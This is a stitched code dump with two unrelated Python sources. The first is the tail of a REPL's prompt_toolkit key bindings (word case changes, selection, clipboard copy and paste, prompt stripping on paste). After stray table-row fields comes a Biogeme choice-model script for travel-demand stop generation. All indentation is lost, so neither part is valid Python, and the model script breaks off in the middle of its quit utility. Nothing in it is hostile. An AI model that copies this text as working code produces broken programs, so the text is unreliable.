# Original text & cursor position.
otext = buffer.text
ocpos = buffer.cursor_position
# Don't overwrite the newline itself. Just before the line ending,
# it should act like insert mode.
overwritten_text = otext[ocpos:ocpos + len(data)]
buffer.text = otext[:ocpos] + data + otext[ocpos + len(overwritten_text):]
if move_cursor:
buffer.cursor_position += len(data)
@r.add_binding(Keys.Escape, 'l')
def downcase_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
insert_text_ovewrite(buffer, word.lower())
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'u')
def upcase_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
insert_text_ovewrite(buffer, word.upper())
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'c')
def capitalize_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
# Don't use word.capitalize() because the first character could be
# - or _
for i, c in enumerate(word):
if c.isalnum():
word = word[:i] + c.capitalize() + word[i+1:].lower()
break
insert_text_ovewrite(buffer, word)
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, Keys.ControlF)
def forward_sexp(event):
buffer = event.current_buffer
document = buffer.document
text = buffer.text
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
matching, mismatching = matching_parens(text)
for opening, closing in matching:
if opening.start == (row, col):
new_pos = document.translate_row_col_to_index(closing.end[0]-1, closing.end[1])
buffer.cursor_position = new_pos
return
event.app.output.bell()
@r.add_binding(Keys.Escape, Keys.ControlB)
def backward_sexp(event):
buffer = event.current_buffer
document = buffer.document
text = buffer.text
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
matching, mismatching = matching_parens(text)
for opening, closing in matching:
if closing.end == (row, col):
new_pos = document.translate_row_col_to_index(opening.start[0]-1, opening.start[1])
buffer.cursor_position = new_pos
return
event.app.output.bell()
@r.add_binding(Keys.Left)
def left_multiline(event):
"""
Left that wraps around in multiline.
"""
if event.current_buffer.cursor_position - event.arg >= 0:
event.current_buffer.cursor_position -= event.arg
if getattr(event.current_buffer.selection_state, "shift_arrow", False):
event.current_buffer.selection_state = None
@r.add_binding(Keys.Right)
def right_multiline(event):
"""
Right that wraps around in multiline.
"""
if event.current_buffer.cursor_position + event.arg <= len(event.current_buffer.text):
event.current_buffer.cursor_position += event.arg
if getattr(event.current_buffer.selection_state, "shift_arrow", False):
event.current_buffer.selection_state = None
@r.add_binding(Keys.ControlD)
def exit(event):
event.app.exit(exception=EOFError, style='class:exiting')
@r.add_binding(Keys.ControlC, filter=~is_searching)
def keyboard_interrupt(event):
event.app.exit(exception=KeyboardInterrupt, style='class:aborting')
is_returnable = Condition(
lambda: get_app().current_buffer.is_returnable)
@r.add_binding(Keys.Enter, filter=is_returnable)
def multiline_enter(event):
"""
When not in multiline, execute. When in multiline, try to
intelligently add a newline or execute.
"""
buffer = event.current_buffer
document = buffer.document
multiline = document_is_multiline_python(document)
text_after_cursor = document.text_after_cursor
text_before_cursor = document.text_before_cursor
text = buffer.text
    # isspace doesn't respect vacuous truth: "".isspace() is False, so the empty case is checked separately
if (not text_after_cursor or text_after_cursor.isspace()) and text_before_cursor.replace(' ', '').endswith('\n'):
# If we are at the end of the buffer, accept unless we are in a
# docstring
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
if multiline and inside_string(text, row, col):
# We are inside a docstring
auto_newline(event.current_buffer)
else:
accept_line(event)
elif not multiline:
# Always accept a single valid line. Also occurs for unclosed single
# quoted strings (which will give a syntax error)
accept_line(event)
else:
auto_newline(event.current_buffer)
# Always accept the line if the previous key was Up
# Requires https://github.com/jonathanslenders/python-prompt-toolkit/pull/492.
# We don't need a parallel for down because down is already at the end of the
# prompt.
@r.add_binding(Keys.Enter, filter=is_returnable)
def accept_after_history_backward(event):
pks = event.previous_key_sequence
if pks and getattr(pks[-1], 'accept_next', False) and ((len(pks) == 1 and
pks[0].key == "up") or (len(pks) == 2 and pks[0].key == "escape"
and isinstance(pks[1].key, str) and pks[1].key in ['p', 'P', 'up',
'down'])):
accept_line(event)
else:
multiline_enter(event)
@r.add_binding(Keys.Escape, Keys.Enter)
@r.add_binding(Keys.Escape, Keys.ControlJ)
def insert_newline(event):
auto_newline(event.current_buffer)
@r.add_binding(Keys.ControlO)
def open_line(event):
event.current_buffer.newline(copy_margin=False)
event.current_buffer.cursor_left()
# M-[ a g is set to S-Enter in iTerm2 settings
Keys.ShiftEnter = "<Shift-Enter>"
ALL_KEYS.append('<Shift-Enter>')
ANSI_SEQUENCES['\x1b[ag'] = Keys.ShiftEnter
ANSI_SEQUENCES['\x1bOM'] = Keys.ShiftEnter
if prompt_toolkit_version[0] != '3':
r.add_binding(Keys.ShiftEnter)(accept_line)
@r.add_binding(Keys.Tab, filter=tab_should_insert_whitespace)
def indent(event):
"""
When tab should insert whitespace, do that instead of completion.
"""
# Text before cursor on the line must be whitespace because of the
# TabShouldInsertWhitespaceFilter.
before_cursor = event.app.current_buffer.document.current_line_before_cursor
event.app.current_buffer.insert_text(' '*(4 - len(before_cursor)%4))
LEADING_WHITESPACE = re.compile(r'( *)[^ ]?')
@r.add_binding(Keys.Escape, 'm')
def back_to_indentation(event):
"""
Move back to the beginning of the line, ignoring whitespace.
"""
current_line = event.app.current_buffer.document.current_line
before_cursor = event.app.current_buffer.document.current_line_before_cursor
indent = LEADING_WHITESPACE.search(current_line)
if indent:
event.app.current_buffer.cursor_position -= len(before_cursor) - indent.end(1)
@r.add_binding(Keys.Backspace, save_before=if_no_repeat)
def delete_char_or_unindent(event):
buffer = event.app.current_buffer
if buffer.document.current_line_before_cursor.isspace():
spaces = len(buffer.document.current_line_before_cursor)
# Delete up to the tab stop
buffer.delete_before_cursor(count=4 + spaces%-4)
else:
backward_delete_char(event)
# Reset the history search text
buffer.history_search_text = None
@r.add_binding(Keys.Escape, ' ')
def cycle_spacing(event):
"""
Based on emacs's cycle-spacing
On first call, remove all whitespace (if any) from around the cursor and
replace it with a single space.
On second call, remove all whitespace.
On third call, restore the original whitespace and cursor position.
"""
buffer = event.app.current_buffer
# Avoid issues when text grows or shrinks below, keeping the cursor
# position out of sync
cursor_position = buffer.cursor_position
buffer.cursor_position = 0
buffer.text, buffer.cursor_position = do_cycle_spacing(buffer.text, cursor_position)
def do_cycle_spacing(text, cursor_position, state=[]):
rstripped = text[:cursor_position].rstrip()
lstripped = text[cursor_position:].lstrip()
text_before_cursor = text[:cursor_position]
# The first element of state is the original text. The last element is the
# buffer text and cursor position as we last left them. If either of those
# have changed, reset. The state here is global, but that's fine, because
# we consider any change to be enough clear the state. The worst that
# happens here is that we resume when we shouldn't if things look exactly
# as they did where we left off.
# TODO: Use event.previous_key_sequence instead.
if state and state[-1] != (text, cursor_position):
state.clear()
if len(state) == 0:
# Replace all whitespace at the cursor (if any) with a single space.
state.append((text, cursor_position))
cursor_position -= len(text_before_cursor) - len(rstripped) -1
text = rstripped + ' ' + lstripped
state.append((text, cursor_position))
elif len(state) == 2:
# Exactly one space at the cursor. Remove it.
cursor_position -= 1
text = rstripped + lstripped
state.append((text, cursor_position))
elif len(state) == 3:
# Restore original text and cursor position
text, cursor_position = state[0]
state.clear()
if cursor_position < 0:
cursor_position = 0
if cursor_position > len(text):
cursor_position = len(text)
return text, cursor_position
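# A hand-traced sketch of the three-step cycle (not part of the original file);
# the same list must be passed as ``state`` so consecutive calls share history:
#   s = []
#   do_cycle_spacing("foo   bar", 4, state=s)  # -> ('foo bar', 4)    one space
#   do_cycle_spacing("foo bar", 4, state=s)    # -> ('foobar', 3)     no space
#   do_cycle_spacing("foobar", 3, state=s)     # -> ('foo   bar', 4)  original restored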
@r.add_binding(Keys.ControlX, Keys.ControlO)
def delete_blank_lines(event):
"""
On blank line, delete all surrounding blank lines, leaving just one.
On isolated blank line, delete that one.
On nonblank line, delete any immediately following blank lines.
"""
buffer = event.app.current_buffer
document = buffer.document
lines_up_to_current = document.lines[:document.cursor_position_row+1]
lines_after_current = document.lines[document.cursor_position_row+1:]
blank_lines_before = 0
for line in lines_up_to_current[::-1]:
if not line.strip():
blank_lines_before += 1
else:
break
blank_lines_after = 0
for line in lines_after_current:
if not line.strip():
blank_lines_after += 1
else:
break
if not blank_lines_before:
stripped_before = lines_up_to_current
else:
stripped_before = lines_up_to_current[:-blank_lines_before]
stripped_after = lines_after_current[blank_lines_after:]
# XXX: Emacs always keeps a newline at the end of the file, but I don't
# think it matters here.
if (not blank_lines_before and blank_lines_after) or blank_lines_before + blank_lines_after == 1:
new_text = '\n'.join(stripped_before + stripped_after)
elif blank_lines_before + blank_lines_after == 0:
return
else:
buffer.cursor_up(max(blank_lines_before-1, 0))
new_text = '\n'.join(stripped_before + [''] + stripped_after)
# Even though we do auto_up, it can be out of bounds from trailing
# whitespace
buffer.cursor_position = min(buffer.cursor_position, len(new_text))
buffer.text = new_text
@r.add_binding(Keys.ControlX, Keys.ControlT)
def transpose_lines(event):
buffer = event.current_buffer
document = buffer.document
row = document.cursor_position_row
new_lines = document.lines[:]
if len(new_lines) == 1:
new_lines.append('')
if row == 0:
buffer.cursor_down()
row += 1
if row == len(new_lines) - 1:
new_lines.append('')
new_lines[row], new_lines[row-1] = new_lines[row-1], new_lines[row]
buffer.text = '\n'.join(new_lines)
buffer.cursor_down()
beginning_of_line(event)
# Selection stuff
@r.add_binding(Keys.ShiftLeft)
def select_left(event):
buffer = event.current_buffer
if buffer.document.text_before_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
buffer.cursor_position -= event.arg
@r.add_binding(Keys.ShiftRight)
def select_right(event):
buffer = event.current_buffer
if buffer.document.text_after_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
buffer.cursor_position += event.arg
@r.add_binding(Keys.Up)
def auto_up(event):
buffer = event.current_buffer
count = event.arg
if buffer.document.cursor_position_row > 0:
buffer.cursor_up(count=count)
elif not buffer.selection_state:
event.key_sequence[-1].accept_next = True
buffer.history_backward(count=count)
if getattr(buffer.selection_state, "shift_arrow", False):
buffer.selection_state = None
@r.add_binding(Keys.Down)
def auto_down(event):
buffer = event.current_buffer
count = event.arg
if buffer.document.cursor_position_row < buffer.document.line_count - 1:
buffer.cursor_down(count=count)
elif not buffer.selection_state:
buffer.history_forward(count=count)
if getattr(buffer.selection_state, "shift_arrow", False):
buffer.selection_state = None
@r.add_binding(Keys.ShiftUp)
def select_line_up(event):
buffer = event.current_buffer
if buffer.document.text_before_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
up_position = buffer.document.get_cursor_up_position()
buffer.cursor_position += up_position
if not up_position:
buffer.cursor_position = 0
@r.add_binding(Keys.ShiftDown)
def select_line_down(event):
buffer = event.current_buffer
if buffer.document.text_after_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
down_position = buffer.document.get_cursor_down_position()
buffer.cursor_position += down_position
if not down_position:
buffer.cursor_position = len(buffer.document.text)
# The default doesn't toggle correctly
@r.add_binding(Keys.ControlSpace)
def toggle_selection(event):
buffer = event.current_buffer
if buffer.selection_state:
buffer.selection_state = None
else:
buffer.start_selection()
@r.add_binding(Keys.ControlX, 'h')
def select_all(event):
buffer = event.current_buffer
buffer.selection_state = SelectionState(len(buffer.document.text))
buffer.cursor_position = 0
@r.add_binding(Keys.Delete, filter=HasSelection())
@r.add_binding(Keys.Backspace, filter=HasSelection())
def delete_selection(event):
event.current_buffer.cut_selection()
@r.add_binding(Keys.Any, filter=HasSelection())
def self_insert_and_clear_selection(event):
event.current_buffer.cut_selection()
self_insert(event)
@r.add_binding(Keys.ControlK, filter=HasSelection())
@r.add_binding(Keys.ControlU, filter=HasSelection())
def kill_selection(event):
data = event.current_buffer.cut_selection()
event.app.clipboard.set_data(data)
def system_copy(text):
if "Linux" in platform.platform():
copy_command = ['xclip', '-selection', 'c']
else:
copy_command = ['pbcopy']
try:
# In Python 3.6 we can do this:
# run(copy_command, input=text, encoding='utf-8', check=True)
subprocess.run(copy_command, input=text.encode('utf-8'), check=True)
except FileNotFoundError:
print("Error: could not find", copy_command[0], file=sys.stderr)
except subprocess.CalledProcessError as e:
print(copy_command[0], "error:", e, file=sys.stderr)
def system_paste():
if "Linux" in platform.platform():
paste_command = ['xsel', '-b']
else:
paste_command = ['pbpaste']
try:
# In Python 3.6 we can do this:
# run(paste_command, input=text, encoding='utf-8')
p = subprocess.run(paste_command, stdout=subprocess.PIPE, check=True)
except FileNotFoundError:
print("Error: could not find", paste_command[0], file=sys.stderr)
except subprocess.CalledProcessError as e:
print(paste_command[0], "error:", e, file=sys.stderr)
return p.stdout.decode('utf-8')
@r.add_binding(Keys.ControlX, Keys.ControlW)
def copy_to_clipboard(event):
if event.current_buffer.document.selection:
from_, to = event.current_buffer.document.selection_range()
run_in_terminal(lambda:system_copy(event.current_buffer.document.text[from_:to + 1]))
@r.add_binding(Keys.ControlX, Keys.ControlY)
def paste_from_clipboard(event):
paste_text_future = run_in_terminal(system_paste)
event.current_buffer.cut_selection()
paste_text_future.add_done_callback(lambda future:\
event.current_buffer.paste_clipboard_data(ClipboardData(future.result())))
# M-[ a b is set to C-S-/ (C-?) in iTerm2 settings
Keys.ControlQuestionmark = "<C-?>"
ALL_KEYS.append("<C-?>")
ANSI_SEQUENCES['\x1b[ab'] = Keys.ControlQuestionmark
Keys.ControlSlash = "<C-/>"
ALL_KEYS.append("<C-/>")
ANSI_SEQUENCES['\x1b"5/'] = Keys.ControlSlash
# This won't work until
# https://github.com/jonathanslenders/python-prompt-toolkit/pull/484 is
# merged.
if prompt_toolkit_version[0] != '3':
@r.add_binding(Keys.ControlQuestionmark, save_before=lambda e: False)
def redo(event):
event.current_buffer.redo()
@r.add_binding(Keys.ControlSlash, save_before=lambda e: False)
def undo(event):
event.current_buffer.undo()
# Need to escape all spaces here because of verbose (x) option below
ps1_prompts = [r'>>>\ '] + [re.escape(i) + r'\[\d+\]:\ ' for i, j in emoji + [emoji_pudb]] + [r'In\ \[\d+\]:\ ']
ps2_prompts = [r'\ *\.\.\.:\ ?', r'\.\.\.\ ?', '\N{CLAPPING HANDS SIGN}+\\ ?⎢\\ ?']
PS1_PROMPTS_RE = re.compile('|'.join(ps1_prompts))
PS2_PROMPTS_RE = re.compile('|'.join(ps2_prompts))
PROMPTED_TEXT_RE = re.compile(r'''(?x) # Multiline and verbose
(?P<prompt>
(?P<ps1prompt>{PS1_PROMPTS_RE.pattern}) # Match prompts at the front
| (?P<ps2prompt>{PS2_PROMPTS_RE.pattern}))? # of the line.
(?P<noprompt>(?(prompt)\r|))? # If the prompt is not
# matched, this is a special
# marker group that will match
# the empty string.
# Otherwise it will not
# match (because all \r's
# have been stripped from
# the string).
(?P<line>.*)\n # The actual line.
'''.format(PS1_PROMPTS_RE=PS1_PROMPTS_RE, PS2_PROMPTS_RE=PS2_PROMPTS_RE))
def prompt_repl(match):
r"""
repl function for re.sub for clearing prompts
Replaces PS1 prompts with \r and removes PS2 prompts.
"""
# TODO: Remove the lines with no prompt
if match.group('ps1prompt') is not None:
return '\r' + match.group('line') + '\n'
elif match.group('ps2prompt') is not None:
return match.group('line') + '\n'
return ''
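# For instance (a hand-checked sketch, assuming the prompt patterns above):
#   PROMPTED_TEXT_RE.sub(prompt_repl, '>>> a = 1\n... b = 2\n') -> '\ra = 1\nb = 2\n'
# split_prompts() below then splits the pasted text on the inserted '\r'.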
def split_prompts(text, indent=''):
r"""
Takes text copied from mypython, Python, or IPython session and returns a
list of inputs
Outputs are stripped. If no prompts are found the text is left alone.
The resulting text is indented by indent, except for the first line.
It is assumed that the text contains no carriage returns (\r).
Trailing whitespace and newlines is stripped from the outputs.
Example:
>>> split_prompts('''
... In [1]: a = 1
...
... In [2]: a
... Out[2]: 1
...
... In [3]: def test():
... ...: pass
... ...:
... ''')
['a = 1', 'a', 'def test():\n pass']
"""
from .mypython import validate_text
text = textwrap.dedent(text).strip() + '\n'
text = textwrap.dedent(PROMPTED_TEXT_RE.sub(prompt_repl, text)).lstrip()
lines = text.split('\r')
# Make sure multilines end in two newlines
for i, line in enumerate(lines):
try:
validate_text(line)
except SyntaxError:
# If there is a syntax error, we can't use the CMD_QUEUE (it
# breaks things).
lines = ['\n'.join(lines)]
break
if '\n' in line.rstrip():
lines[i] += '\n'
lines[0] = textwrap.indent(lines[0], indent,
# Don't indent the first line, it's already indented
lambda line, _x=[]: bool(_x or _x.append(1)))
for i in range(1, len(lines)):
lines[i] = textwrap.indent(lines[i], indent)
# Extraneous newlines at the end will be stripped by the prompt anyway.
# This just makes this function easier to test.
lines = [i.rstrip() for i in lines]
return lines
@r.add_binding(Keys.BracketedPaste)
def bracketed_paste(event):
from .mypython import CMD_QUEUE
data = event.data
buffer = event.current_buffer
# Be sure to use \n as line ending.
# This part is the same as the default binding
# Some terminals (Like iTerm2) seem to paste \r\n line endings in a
# bracketed paste. See: https://github.com/ipython/ipython/issues/9737
data = data.replace('\r\n', '\n')
data = data.replace('\r', '\n')
# Replace tabs with four spaces (C-x C-y will still paste the text exactly)
data = data.replace('\t', ' ')
# Strip prompts off pasted text
document = buffer.document
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
if not inside_string(event.current_buffer.text, row, col):
indent = LEADING_WHITESPACE.match(document.current_line_before_cursor)
current_line_indent = indent.group(1) if indent else ''
if PS1_PROMPTS_RE.match(data.strip()) or PS2_PROMPTS_RE.match(data.strip()):
lines = split_prompts(data, current_line_indent)
else:
lines = [textwrap.indent(data, current_line_indent,
# Don't indent the first line, it's already indented
lambda line, _x=[]: bool(_x or _x.append(1)))]
else:
lines = [data]
event.current_buffer.insert_text(lines[0])
for text in lines[1:]:
# TODO: Send last chunk as bracketed paste, so it can be edited
CMD_QUEUE.append(text)
if CMD_QUEUE:
accept_line(event)
@r.add_binding(Keys.Escape, ';')
def comment(event):
buffer = event.current_buffer
document = buffer.document
cursor_line, cursor_col = document.translate_index_to_position(document.cursor_position)
if document.selection:
from_, to = document.selection_range()
start_line, start_col = document.translate_index_to_position(from_)
end_line, end_col = document.translate_index_to_position(to - 1)
end_line += 1
else:
start_line = cursor_line
end_line = start_line + 1
# Get the indentation for the comment delimiters
min_indent = float('inf')
for line in document.lines[start_line:end_line]:
if not line.strip():
continue
indent = LEADING_WHITESPACE.search(line)
if indent:
min_indent = min(min_indent, len(indent.group(1)))
else:
min_indent = 0
if min_indent == 0:
break
if min_indent == float('inf'):
min_indent = 0
uncomment = (all(not line.strip() or line[min_indent] == '#' for line in
document.lines[start_line:end_line])
and ''.join(document.lines[start_line:end_line]).strip())
lines = []
for i, line in enumerate(document.lines):
if start_line <= i < end_line:
if uncomment:
lines.append(line[:min_indent] + line[min_indent+2:])
else:
lines.append(line[:min_indent] + '# ' + line[min_indent:])
else:
lines.append(line)
new_text = '\n'.join(lines)
# TODO: Set the cursor position correctly
n_changed = 2*(cursor_line - start_line + 1)
if cursor_line >= end_line - 1:
n_changed -= 2
if uncomment:
buffer.cursor_position -= n_changed
buffer.text = new_text
else:
buffer.text = new_text
buffer.cursor_position += n_changed
@r.add_binding(Keys.ControlX, Keys.ControlE)
def open_in_editor(event):
event.current_buffer.open_in_editor(event.app)
@r.add_binding(Keys.ControlX, Keys.ControlS)
@r.add_binding(Keys.ControlX, Keys.ControlC)
def noop(event):
pass
| 1.804688 | 2 |
demand/preday_model_estimation/isg.py | gusugusu1018/simmobility-prod | 50 | 3466 | from biogeme import *
from headers import *
from loglikelihood import *
from statistics import *
from nested import *
#import random
cons_work= Beta('cons for work', 0,-10,10,0)
cons_edu = Beta('cons for education',0,-50,10,0)
cons_shopping = Beta('cons for shopping',0,-10,10,0)
cons_other = Beta('cons for other',0,-10,10,0)
cons_Q = Beta('cons for quit',0,-10,10,1)
first_stop_inbound= Beta('dummy for first stop of inbound half tour', 0,-10,10,1)
second_stop_inbound= Beta('dummy for second stop of inbound half tour',0,-10,10,0)
threeplus_stop_inbound=Beta('dummy for 3+ stop of inbound half tour',0,-10,10,0)
first_stop_outbound= Beta('dummy for first stop of outbound half tour', 0,-10,10,0)
second_stop_outbound= Beta('dummy for second stop of outbound half tour',0,-10,10,0)
threeplus_stop_outbound=Beta('dummy for 3+ stop of outbound half tour',0,-10,10,0)
work_tour_dummy_Q=Beta('work tour dummy in quit',0,-10,10,1)
edu_tour_dummy_Q=Beta('edu tour dummy in quit',0,-10,10,1)
shopping_tour_dummy_Q=Beta('shopping tour dummy in quit',0,-10,10,1)
other_tour_dummy_Q=Beta('other tour dummy in quit',0,-10,10,1)
first_tour_dummy_Q=Beta('first tour dummy in quit',0,-10,10,0)
sub_tour_dummy_Q=Beta('has subtour dummy in quit',0,-10,10,0)
zero_tour_remain_Q=Beta('zero tour remain dummy',0,-10,10,1)
one_tour_remain_Q=Beta('one tour remain dummy',0,-10,10,0)
twoplus_tour_remain_Q=Beta('2+ tour remain dummy',0,-10,10,1)
work_tour_dummy_W=Beta('work tour dummy in work',0,-10,10,1)
edu_tour_dummy_W=Beta('edu tour dummy in work',0,-10,10,1)
shopping_tour_dummy_W=Beta('shopping tour dummy in work',0,-10,10,1)
other_tour_dummy_W=Beta('other tour dummy in work',0,-10,10,1)
female_dummy_W=Beta('female dummy in work',0,-10,10,0)
student_dummy_W=Beta('student dummy in work',0,-10,10,1)
worker_dummy_W=Beta('worker dummy in work',0,-10,10,1)
driver_dummy_W=Beta('driver dummy in work',0,-10,10,0)
passenger_dummy_W=Beta('passenger dummy in work',0,-10,10,0)
public_dummy_W=Beta('PT dummy in work',0,-10,10,0)
work_tour_dummy_E=Beta('work tour dummy in edu',0,-10,10,1)
edu_tour_dummy_E=Beta('edu tour dummy in edu',0,-10,10,1)
shopping_tour_dummy_E=Beta('shopping tour dummy in edu',0,-10,10,1)
other_tour_dummy_E=Beta('other tour dummy in edu',0,-10,10,1)
female_dummy_E=Beta('female dummy in edu',0,-10,10,0)
student_dummy_E=Beta('student dummy in edu',0,-10,10,1)
worker_dummy_E=Beta('worker dummy in edu',0,-10,10,1)
driver_dummy_E=Beta('driver dummy in edu',0,-10,10,0)
passenger_dummy_E=Beta('passenger dummy in edu',0,-10,10,0)
public_dummy_E=Beta('PT dummy in edu',0,-10,10,0)
work_tour_dummy_S=Beta('work tour dummy in shopping',0,-10,10,1)
edu_tour_dummy_S=Beta('edu tour dummy in shopping',0,-10,10,1)
shopping_tour_dummy_S=Beta('shopping tour dummy in shopping',0,-10,10,1)
other_tour_dummy_S=Beta('other tour dummy in shopping',0,-10,10,0)
female_dummy_S=Beta('female dummy in shopping',0,-10,10,0)
student_dummy_S=Beta('student dummy in shopping',0,-10,10,1)
worker_dummy_S=Beta('worker dummy in shopping',0,-10,10,0)
driver_dummy_S=Beta('driver dummy in shopping',0,-10,10,0)
passenger_dummy_S=Beta('passenger dummy in shopping',0,-10,10,0)
public_dummy_S=Beta('PT dummy in shopping',0,-10,10,0)
work_tour_dummy_O=Beta('work tour dummy in other',0,-10,10,0)
edu_tour_dummy_O=Beta('edu tour dummy in other',0,-10,10,0)
shopping_tour_dummy_O=Beta('shopping tour dummy in other',0,-10,10,0)
other_tour_dummy_O=Beta('other tour dummy in other',0,-10,10,1)
female_dummy_O=Beta('female dummy in other',0,-10,10,0)
student_dummy_O=Beta('student dummy in other',0,-10,10,0)
worker_dummy_O=Beta('worker dummy in other',0,-10,10,0)
driver_dummy_O=Beta('driver dummy in other',0,-10,10,0)
passenger_dummy_O=Beta('passenger dummy in other',0,-10,10,0)
public_dummy_O=Beta('PT dummy in other',0,-10,10,0)
work_logsum=Beta('work logsum in work',0,-10,10,1)
edu_logsum=Beta('edu logsum in edu',0,-10,10,1)
shop_logsum=Beta('shop logsum in shop',0,-10,10,1)
other_logsum=Beta('other logsum in other',0,-10,10,1)
time_window_work=Beta('time available in work',0,-10,10,1)
time_window_edu= Beta('time available in edu',0,-10,10,1)
time_window_shopping= Beta('time available in shopping',0,-10,10,1)
time_window_other= Beta('time available in other',0,-10,10,1)
tour_distance_work= Beta('log tour distance in work',0,-10,10,0)
tour_distance_edu= Beta('log tour distance in edu',0,-10,10,0)
tour_distance_shopping= Beta('log tour distance in shopping',0,-10,10,0)
tour_distance_other=Beta('log tour distance in other',0,-10,10,0)
a700_a930_work= Beta('period 7am to 9:30am in work',0,-10,10,0)
a930_a1200_work=Beta('period 9:30am to 12pm in work',0,-10,10,0)
p300_p530_work=Beta('period 3pm to 5:30pm in work',0,-10,10,0)
p530_p730_work=Beta('period 5:30pm to 7:30 pm in work',0,-10,10,0)
p730_p1000_work=Beta('period 7:30pm to 10pm in work',0,-10,10,0)
p1000_a700_work=Beta('period 10pm to 7am in work',0,-10,10,0)
a700_a930_edu= Beta('period 7am to 9:30am in edu',0,-10,10,0)
a930_a1200_edu=Beta('period 9:30am to 12pm in edu',0,-10,10,0)
p300_p530_edu=Beta('period 3pm to 5:30pm in edu',0,-10,10,0)
p530_p730_edu=Beta('period 5:30pm to 7:30 pm in edu',0,-10,10,0)
p730_p1000_edu=Beta('period 7:30pm to 10pm in edu',0,-10,10,0)
p1000_a700_edu=Beta('period 10pm to 7am in edu',0,-10,10,0)
a700_a930_shopping= Beta('period 7am to 9:30am in shopping',0,-10,10,0)
a930_a1200_shopping=Beta('period 9:30am to 12pm in shopping',0,-10,10,0)
p300_p530_shopping=Beta('period 3pm to 5:30pm in shopping',0,-10,10,0)
p530_p730_shopping=Beta('period 5:30pm to 7:30 pm in shopping',0,-10,10,0)
p730_p1000_shopping=Beta('period 7:30pm to 10pm in shopping',0,-10,10,0)
p1000_a700_shopping=Beta('period 10pm to 7am in shopping',0,-10,10,0)
a700_a930_other= Beta('period 7am to 9:30am in other',0,-10,10,0)
a930_a1200_other=Beta('period 9:30am to 12pm in other',0,-10,10,0)
p300_p530_other=Beta('period 3pm to 5:30pm in other',0,-10,10,0)
p530_p730_other=Beta('period 5:30pm to 7:30 pm in other',0,-10,10,0)
p730_p1000_other=Beta('period 7:30pm to 10pm in other',0,-10,10,0)
p1000_a700_other=Beta('period 10pm to 7am in other',0,-10,10,0)
MU1 = Beta('MU for quit',1,0,100,1)
MU2 = Beta('MU for non-quit', 1.0,0,100,1)
#V for work
V_work= cons_work+\
work_tour_dummy_W*1*(tour_type==1)+\
edu_tour_dummy_W*1*(tour_type==2)+\
shopping_tour_dummy_W*1*(tour_type==3)+\
other_tour_dummy_W*1*(tour_type==4)+\
female_dummy_W*female_dummy+\
student_dummy_W*student_dummy+\
worker_dummy_W*worker_dummy+\
driver_dummy_W*driver_dummy+\
passenger_dummy_W*passenger_dummy+\
public_dummy_W*public_dummy+\
work_logsum * worklogsum+\
time_window_work*time_window_h+\
tour_distance_work*log(1+distance)+\
a700_a930_work*p_700a_930a+\
a930_a1200_work*p_930a_1200a+\
p300_p530_work*p_300p_530p+\
p530_p730_work*p_530p_730p+\
p730_p1000_work*p_730p_1000p+\
p1000_a700_work*p_1000p_700a
#V for education
V_edu = cons_edu+\
work_tour_dummy_E*1*(tour_type==1)+\
edu_tour_dummy_E*1*(tour_type==2)+\
shopping_tour_dummy_E*1*(tour_type==3)+\
other_tour_dummy_E*1*(tour_type==4)+\
female_dummy_E*female_dummy+\
student_dummy_E*student_dummy+\
worker_dummy_E*worker_dummy+\
driver_dummy_E*driver_dummy+\
passenger_dummy_E*passenger_dummy+\
public_dummy_E*public_dummy+\
edu_logsum * edulogsum+\
time_window_edu*time_window_h+\
tour_distance_edu*log(1+distance)+\
a700_a930_edu*p_700a_930a+\
a930_a1200_edu*p_930a_1200a+\
p300_p530_edu*p_300p_530p+\
p530_p730_edu*p_530p_730p+\
p730_p1000_edu*p_730p_1000p+\
p1000_a700_edu*p_1000p_700a
#V for shopping
V_shopping = cons_shopping+\
work_tour_dummy_S*1*(tour_type==1)+\
edu_tour_dummy_S*1*(tour_type==2)+\
shopping_tour_dummy_S*1*(tour_type==3)+\
other_tour_dummy_S*1*(tour_type==4)+\
female_dummy_S*female_dummy+\
student_dummy_S*student_dummy+\
worker_dummy_S*worker_dummy+\
driver_dummy_S*driver_dummy+\
passenger_dummy_S*passenger_dummy+\
public_dummy_S*public_dummy+\
shop_logsum * shoplogsum+\
time_window_shopping*time_window_h+\
tour_distance_shopping*log(1+distance)+\
a700_a930_shopping*p_700a_930a+\
a930_a1200_shopping*p_930a_1200a+\
p300_p530_shopping*p_300p_530p+\
p530_p730_shopping*p_530p_730p+\
p730_p1000_shopping*p_730p_1000p+\
p1000_a700_shopping*p_1000p_700a
#V for other
V_other=cons_other+\
work_tour_dummy_O*1*(tour_type==1)+\
edu_tour_dummy_O*1*(tour_type==2)+\
shopping_tour_dummy_O*1*(tour_type==3)+\
other_tour_dummy_O*1*(tour_type==4)+\
female_dummy_O*female_dummy+\
student_dummy_O*student_dummy+\
worker_dummy_O*worker_dummy+\
driver_dummy_O*driver_dummy+\
passenger_dummy_O*passenger_dummy+\
public_dummy_O*public_dummy+\
other_logsum * otherlogsum+\
time_window_other*time_window_h+\
tour_distance_other*log(1+distance)+\
a700_a930_other*p_700a_930a+\
a930_a1200_other*p_930a_1200a+\
p300_p530_other*p_300p_530p+\
p530_p730_other*p_530p_730p+\
p730_p1000_other*p_730p_1000p+\
p1000_a700_other*p_1000p_700a
#V for quit
V_quit= cons_Q+first_stop_inbound*first_stop*first_bound+\
